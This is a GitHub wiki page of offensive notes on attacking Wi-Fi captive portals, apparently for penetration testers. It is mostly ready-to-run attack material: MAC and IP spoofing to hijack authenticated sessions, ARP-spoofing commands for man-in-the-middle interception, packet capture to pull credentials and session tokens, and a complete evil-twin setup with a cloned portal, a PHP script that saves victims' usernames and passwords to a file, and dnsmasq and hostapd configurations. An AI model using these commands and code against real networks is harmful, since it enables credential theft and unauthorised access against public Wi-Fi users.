Wireless Captive Portals - CraigDonkin/Infrastructure GitHub Wiki
- Connect to WiFi
- Get an IP from DHCP
- DNS Hijack the user to get to the Captive Portal page
- User will authenticate (Credentials, voucher, access code, payment etc.)
- The user is then granted access
- This could be a FW rule change, MAC being added to allowlist etc.
- Identify the gateway - this will likely correspond to the captive portal.
route -n
- Check to see if ICMP traffic is allowed
traceroute <ip>
traceroute -p 443 <ip>
traceroute -p 80 <ip>
- scan the captive portal with nmap/nuclei etc
- MITM
- Credential Phishing
- Bypassing
- Attacks on the portal
- SQLi
- XSS
- impersonate an authenticated client
- Put interface into monitor mode
airmon-ng start <interface>
- Scan the network for Wi-Fi AP and connected clients
airodump-ng --bssid <MAC> <interface>
- Identify the IP address of the MAC address
nmap -v -n -sn <ip range> | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}/MAC Address:/{print " => "$3;}'
- Switch the MAC address
ifconfig <interface> down
macchanger -m <mac> <interface>
ifconfig <interface> up
- Spoof the IP address
ifconfig <interface> <ip> netmask <mask>
route add default via <default gw>
https://raw.githubusercontent.com/crishoj/hack-captive-portals/refs/heads/master/hack-captive.sh
- If UDP 53 has been left open for connectivity tests
- Use dig to determine if DNS requests are allowed
dig google.com +short
- If the DNS request resolves to a private IP, the captive portal is intercepting traffic and handling DNS resolution.
- Check to see if UDP 53 is open on the network gateway
nmap -sU -sV -p 53 <ip>
- Configure OpenVPN client to establish a connection on UDP 53
-
Conduct ARP spoofing attack, MITM and then:
- Intercept traffic
- DNS spoof
- TLS downgrade
-
Identify assigned IP and MAC of the Wireless adapter
-
Scan the network to identify active clients
-
Conduct arp spoofing attack
arpspoof -i <interface> -t <client IP> <Gateway IP>
arpspoof -i <interface> -t <Gateway IP> <client IP>
- Ettercap can also be used to do the attack
- Select the interface then click the checkmark icon
- Click scan for hosts
- Click on the hosts list
- Select SSL intercept from the MITM menu
- Set the Gateway as target 1
- Initiate ARP poisoning attack from the MITM menu
- Enable monitor mode
airmon-ng start <interface>
- scan
airodump-ng <interface>
- identify the target network and note the bssid MAC, then use airodump
airodump-ng --bssid <mac> <interface> -w credcap
airodump-ng --bssid <mac> <interface> -w sessioncap
- Load the capture in wireshark and use filters to find credentials, session tokens,
- Enable Apache Rewrite
a2enmod rewrite
- Edit /etc/apache2/apache2.conf
<Directory />
Options FollowSymLinks
AllowOverride All
Require all denied
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
- Create .htacces inside /var/www/html
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . index.html [L]
- Restart Apache
service apache2 restart
- Clone the captive portal
httrack <url>
- Direct the form action to received.php
<form action="/received.php" method="POST" class="centered-form">
- Received.php:
<?php
if(isset($_POST['submit'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$data = $username . ' ' . $password . "\r\n";
$ret = file_put_contents('passes.lst', $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
die('An error has occurred');
}
else {
echo "Thank you for signing in. You will be redirected shortly!";
}
}
else {
die('No post data to process');
}
?>
-
Store the fake portal in /var/www/html
-
Configure DNS and DHCP for the rogue access point
- dnsmasq dns.conf:
interface=wlan1
dhcp-range=192.168.0.2,192.168.0.254,255.255.255.0,10h
dhcp-option=3,192.168.0.1
dhcp-option=6,192.168.0.1
server=8.8.4.4
server=8.8.8.8
listen-address=127.0.0.1
address=/#/192.168.0.1
log-dhcp
log-queries
service dnsmasq stop
service dnsmasq -C dns.conf -d
- Assign a valid IP to the wireless interface
ifconfig <interface> <ip>/24
- Ensure IP Forwarding is enabled
sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
- Setup Access Point
- create hostapd.conf
interface=wlan1
driver=nl80211
ssid=<SSID>
hw_mode=g
channel=1
auth_algs=1
bssid=<MAC address>
- Launch the AP:
hostapd hostapd.conf
- Wait for clients to connect, or run a deauth attack.